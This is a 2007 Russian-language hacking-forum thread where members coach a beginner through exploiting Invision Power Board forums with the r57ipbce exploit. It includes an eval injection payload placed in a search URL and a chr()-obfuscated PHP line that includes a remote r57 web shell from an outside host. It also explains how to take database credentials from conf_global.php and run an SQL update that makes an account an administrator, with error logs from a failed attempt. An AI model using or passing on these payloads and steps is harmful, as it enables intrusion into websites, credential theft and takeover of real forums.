Где взять include для эксплоита r57ipbce?

Discussion in 'Песочница' started by 3a6bI/\, 21 Jan 2007.

Thread Status:
Not open for further replies.
  1. 3a6bI/\

    3a6bI/\ New Member

    Joined:
    16 Dec 2006
    Messages:
    17
    Likes Received:
    2
    Reputations:
    2
    И как проверить заинклюдился шелл или нет?
     
  2. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    как как, ты его увидешь...
     
  3. 3a6bI/\

    3a6bI/\ New Member

    Joined:
    16 Dec 2006
    Messages:
    17
    Likes Received:
    2
    Reputations:
    2
    Можешь пожалуйста объяснить подробнее. Вот я в строке поиска ввел что надо, нажал интер и что дальше делать? плиз ты же умный ) помоги
     
  4. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    Заходишь на форум IPB, создаешь тему в которой пишешь код(в каиором зашифрована ссылка на шелл r57), затем в поиске ищешь r57ipbxplhohohoeval, затем в адресной строке браузера удаляешь все, что написано после searchid, и заменяешь на &search_in=posts&result_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00
    И у тебя в браузере открываеться r57 шелл(если форум бажный)
     
  5. 3a6bI/\

    3a6bI/\ New Member

    Joined:
    16 Dec 2006
    Messages:
    17
    Likes Received:
    2
    Reputations:
    2

    hohoho
    Точно hohoho? просто с твоей прогой получается hihihi
     
  6. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    точно, замени на hohoho
     
  7. 3a6bI/\

    3a6bI/\ New Member

    Joined:
    16 Dec 2006
    Messages:
    17
    Likes Received:
    2
    Reputations:
    2
    Теперь ни че не происходит. То есть я заменяю все после search_in, жму интер, окно обновляется и опять открывается поиск.

    Может шелл не так залил, может хостинг фигня...
    Можешь мне дать адрес твоего шелла, если он есть у тебя?
     
    1 person likes this.
  8. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    О. сколько раз на форуме перетирался этот вопрос!

    1) Рабочий шелл


    eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(46). chr(114). chr(99). chr(119). chr(45). chr(116). chr(101). chr(97). chr(109). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(115). chr(104). chr(101). chr(108). chr(108). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42) );//
    2) тему надо создавать новую, с легким названием.
    3) В поиске потом искать по названию темы и выбирать "результат ввиде сообщения"
    4) В конец строки подставлять &lastdate=z|eval.*?%20//)%23e%00
    5) Уязвимость старая, затертая до дыр, форум скорее всего пропатчен
     
    1 person likes this.
  9. 3a6bI/\

    3a6bI/\ New Member

    Joined:
    16 Dec 2006
    Messages:
    17
    Likes Received:
    2
    Reputations:
    2
    Спасибо. И не скажете команды что б в админку залесть или пас украсть? А то просто не хочу все команды подряд перебирать и я не очень шарю в этом
     
  10. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    Я поражаюсь зачем тебе админка, если есть шелл,хотя чему тут удивляться сам таким был :rolleyes: но я все таки попробую тебе объяснить один из способов как попасть в нее, если разумеется у тебя есть шелл.Для начала зарегистрируй юзера и запомни его id, далее надо выдернуть записи из файла forum/conf_global.php
    $INFO['sql_database']='............;
    $INFO['sql_driver']= '.............';
    $INFO['sql_host']='.........';
    $INFO['sql_pass']= '............';
    $INFO['sql_user']='..............';
    Потом в самом низу шелла есть: Выполнение SQL запроса туда вставляешь те данные которые ты вытянул из conf_global.php в сам запрос ставишь
    UPDATE ibf_members SET mgroup=4 WHERE id=ид твоего юзера, и все ты админ, можешь топать в админку.
     
  11. -=void=-

    -=void=- New Member

    Joined:
    24 Feb 2007
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    даже когда отделяешь ; // сплойт неработает почемута ссылка идет с точкой и выдает ошибку можете дать рабочий код ?
     
  12. -=void=-

    -=void=- New Member

    Joined:
    24 Feb 2007
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    IPB WARNING [2] Unknown(): php_network_getaddresses: getaddrinfo failed: Name or service not known (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
    IPB WARNING [2] Unknown(http://.rcw-team.ru/download/shell/r57shell.txt): failed to open stream: Address family not supported by protocol (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
    IPB WARNING [2] Unknown(): php_network_getaddresses: getaddrinfo failed: Name or service not known (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
    IPB WARNING [2] Unknown(http://.rcw-team.ru/download/shell/r57shell.txt): failed to open stream: Address family not supported by protocol (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)
    IPB WARNING [2] (null)(): Failed opening 'http://.rcw-team.ru/download/shell/r57shell.txt' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') (Line: 1 of /sources/search.php(1229) : regexp code(1) : eval()'d code)

    вот что я получаю
     
Thread Status:
Not open for further replies.